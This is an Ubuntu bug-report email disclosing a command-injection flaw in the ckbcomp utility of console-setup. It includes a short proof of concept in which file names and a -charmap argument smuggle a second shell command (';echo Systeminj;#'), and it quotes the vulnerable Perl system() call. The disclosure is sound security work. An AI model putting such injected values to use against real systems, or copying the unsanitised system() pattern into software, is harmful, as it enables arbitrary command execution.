Public bug reported:
Binary package hint: console-setup
/usr/bin/ckbcomp have command injection bug .
test case :
root@emanuel-desktop:/tmp# touch "/etc/console-setup/compose.a;echo
Systeminj;#.inc" "/usr/share/consoletrans/a;echo Systeminj;#.acm" "/tmp/CKB"
root@emanuel-desktop:/tmp# /usr/bin/ckbcomp "/tmp/CKB" -symbols "/tmp/CKB"
-charmap "a;echo Systeminj;#"
WARNING: Can not find "" in "/tmp/CKB".
keymaps 0-127
strings as usual
cat: /etc/console-setup/compose.a: No such file or directory
Systeminj
the bug can be found at :
if ($charmap && -f "/etc/console-setup/compose.${charmap}.inc") {
system("cat /etc/console-setup/compose.${charmap}.inc");
}
** Affects: console-setup (Ubuntu)
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/782705
Title:
command injection in ckbcomp
--
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
